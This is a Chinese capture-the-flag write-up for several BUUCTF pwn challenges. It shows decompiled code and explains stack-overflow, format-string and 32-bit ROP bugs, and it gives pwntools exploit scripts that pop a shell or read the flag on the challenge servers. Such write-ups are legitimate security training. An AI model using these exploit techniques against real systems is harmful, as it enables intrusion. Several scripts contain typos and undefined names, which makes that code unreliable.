buu pwn wp(持续更新)
1、warmup_csaw_2016
main函数如下
__int64 __fastcall main(int a1, char **a2, char **a3)
{
char s[64]; // [rsp+0h] [rbp-80h] BYREF
char v5[64]; // [rsp+40h] [rbp-40h] BYREF
write(1, "-Warm Up-\n", 0xAuLL);
write(1, "WOW:", 4uLL);
sprintf(s, "%p\n", sub_40060D);
write(1, s, 9uLL);
write(1, ">", 1uLL);
return gets(v5);
}
- 首先使用write函数打印文字引导"-Warm Up-", 新行
- 打印"WOW:", 不换行
- 使用sprintf函数将当前sub_40060D函数的地址以16进制格式打印到字符串s中,打印地址和新行
- 打印">",不换行
- 使用gets函数从标准输入读取一行字符到缓冲区v5中
- 返回gets函数读取到的字符数量
提示我们查看sub_40060D函数
sub_40060D函数如下:
int sub_40060D()
{
return system("cat flag.txt");
}
发现是后门函数,可以利用get函数进行栈溢出
exp:
from pwn import *
r = remote("node4.buuoj.cn",25798)
offset = 0x40+8
payload = b'a'*offset+p64(0x0x40060d)
r.sendline(payload)
r.interactive()
2、ciscn_2019_n_1
main函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 2, 0LL);
func();
return 0;
}
这段代码是 C 语言主函数 main 的实现:
- main 函数的参数及返回值符合标准 C 语言主函数定义
- argc 和 argv 是命令行参数,envp 是环境变量
- setvbuf 函数是设置输入/输出缓冲方式的函数:
- _bss_start 是未初始化数据段的起始位置
- 0LL 表示不使用缓冲
- 2 表示使用行缓冲模式
- 0LL 表示缓冲区大小由函数自动决定
- 因此 setvbuf 为 _bss_start 和标准输入 stdin 设置行缓冲模式
- 调用 func() 函数
- 返回 0 表示程序成功终止
主要功能是:
- 设置未初始化数据段和标准输入为行缓冲模式
- 调用函数 func
- 返回主函数退出码 0
继续查看func()函数:
int func()
{
int result; // eax
char v1[44]; // [rsp+0h] [rbp-30h] BYREF
float v2; // [rsp+2Ch] [rbp-4h]
v2 = 0.0;
puts("Let's guess the number.");
gets(v1);
if ( v2 == 11.28125 )
result = system("cat /flag");
else
result = puts("Its value should be 11.28125");
return result;
}
有两种方法:
1.利用gets(v1)
进行栈溢出,然后执行system("cat /flag")
字符串v1:
exp如下:
from pwn import *
r = remote("node4.buuoj.cn",25798)
sys_addr = 0x4006BE
payload = b'A'*(0x30+8) + p64(sys_addr)
r.send(payload)
r.interactive()
2.利用gets(v1)
进行栈溢出,覆盖到v2的部分,将v2的值修改为11.28125
观察到v2是从0x04开始,我们需要覆盖0x30-0x04
个a
这行disassemble代码是对xmm0和存储在cs段中的地址0x4007F4处double字进行单精度浮点数比较的ucomiss指令。
具体来说:
- ucomiss:单精度浮点数比较指令,比较xmm0和直接地址指定的单精度浮点数,结果存储在状态寄存器中。
- xmm0:xmm寄存器,用于存放单精度浮点数操作数。
- cs:dword_4007F4:使用cs段基址加上偏移0x4007F4处存放的单精度浮点数。
- cs段是代码段,通常存储程序代码及静态数据,0x4007F4处可能是某个全局单精度浮点数常量。
所以这条指令是将xmm0寄存器中的单精度浮点数与存储在0x4007F4地址处的单精度浮点常量进行比较,结果通过状态寄存器表示哪个数较大或两数是否相等。
一般情况下这种cmp指令常用于判断单精度浮点数是否满足某个条件,属于浮点数比较及条件判断常用操作。
我们跟进0x4007F4,发现此处存放着41348000h,即11.28125的十六进制。
于是exp如下:
from pwn import *
p=remote('node3.buuoj.cn',29191)
offset = 0x30-0x04
payload = "A"*offset + p64(0x41348000)
p.sendline(payload)
p.interactive()
3、pwn1_sctf_2016
32位
main函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
vuln();
return 0;
}
vuln()函数如下:
int vuln()
{
const char *v0; // eax
char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
char v4[7]; // [esp+40h] [ebp-18h] BYREF
char v5; // [esp+47h] [ebp-11h] BYREF
char v6[7]; // [esp+48h] [ebp-10h] BYREF
char v7[5]; // [esp+4Fh] [ebp-9h] BYREF
printf("Tell me something about yourself: ");
fgets(s, 32, edata);
std::string::operator=(&input, s);
std::allocator<char>::allocator(&v5);
std::string::string(v4, "you", &v5);
std::allocator<char>::allocator(v7);
std::string::string(v6, "I", v7);
replace((std::string *)v3);
std::string::operator=(&input, v3, v6, v4);
std::string::~string(v3);
std::string::~string(v6);
std::allocator<char>::~allocator(v7);
std::string::~string(v4);
std::allocator<char>::~allocator(&v5);
v0 = (const char *)std::string::c_str((std::string *)&input);
strcpy(s, v0);
return printf("So, %s\n", s);
}
这段代码实现了一个简单的字符串替换。
主要步骤:
- 使用printf打印提示用户输入个人信息
- 使用fgets获取输入存入缓冲区s
- 将s赋值给全局变量input
- 构造两个子字符串"you"和"I"
- 调用replace函数替换input中的"I"为"you"
- 打印替换后的结果
fgets(s, 32, edata);
只能读入32个字符
而s从0x3C开始,32个字符无法溢出,但是由于程序会把I替换成you
于是我们就可以造成溢出了
exp如下:
from pwn import *
#r = process('/home/miyu/桌面/warmup_csaw_2016')
#attach(r)
r = remote("node4.buuoj.cn",25798)
payload = b'I'*20+b'a'*4 + p32(0x8048F0D)
r.sendline(payload)
r.interactive()
4.[第五空间2019 决赛]PWN5
main函数:
int __cdecl main(int a1)
{
unsigned int v1; // eax
int result; // eax
int fd; // [esp+0h] [ebp-84h]
char nptr[16]; // [esp+4h] [ebp-80h] BYREF
char buf[100]; // [esp+14h] [ebp-70h] BYREF
unsigned int v6; // [esp+78h] [ebp-Ch]
int *v7; // [esp+7Ch] [ebp-8h]
v7 = &a1;
v6 = __readgsdword(0x14u);
setvbuf(stdout, 0, 2, 0);
v1 = time(0);
srand(v1);
fd = open("/dev/urandom", 0);
read(fd, &dword_804C044, 4u);
printf("your name:");
read(0, buf, 0x63u);
printf("Hello,");
printf(buf);
printf("your passwd:");
read(0, nptr, 0xFu);
if ( atoi(nptr) == dword_804C044 )
{
puts("ok!!");
system("/bin/sh");
}
else
{
puts("fail");
}
result = 0;
if ( __readgsdword(0x14u) != v6 )
sub_80493D0();
return result;
可以发现,第21行printf(buf);
存在格式化字符串漏洞
首先我们确定偏移是10
然后我们确定dword_804C044
bss字段的地址为0x0804C044
- 解法一:
我们可以构造
payload = p32(bss)+p32(bss+1)+p32(bss+2)+p32(bss+3)#4bytes
payload=payload+b'%10$n%11$n%12$n%13$n'
exp如下:
from pwn import *
p = remote("node4.buuoj.cn",28174)
bss = 0x0804C044
payload = p32(bss)+p32(bss+1)+p32(bss+2)+p32(bss+3)#4bytes
payload=payload+b'%10$n%11$n%12$n%13$n'
p.sendline(payload)
p.sendline(str(0x10101010))
p.interactive()
- 解法二:
利用pwntools自带的fmtstr_payload
from pwn import *
p = remote('node4.buuoj.cn',28174)
elf = ELF('/home/miyu/Desktop/pwn')
atoi_got = elf.got['atoi']
system_plt = elf.plt['system']
payload=fmtstr_payload(10,{atoi_got:system_plt})
p.sendline(payload)
p.sendline(b'/bin/sh\x00')
p.interactive()
5.jarvisoj_level2
32位栈溢出+构造ROP链
from pwn import *
p = remote("node4.buuoj.cn",26412)
binsh = 0x0804A024
system_plt = 0x8048320
offset = 0x88+4
payload = b'a'*offset+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()
32位不用ROPgadget查rdi,直接p32(一个常数)即可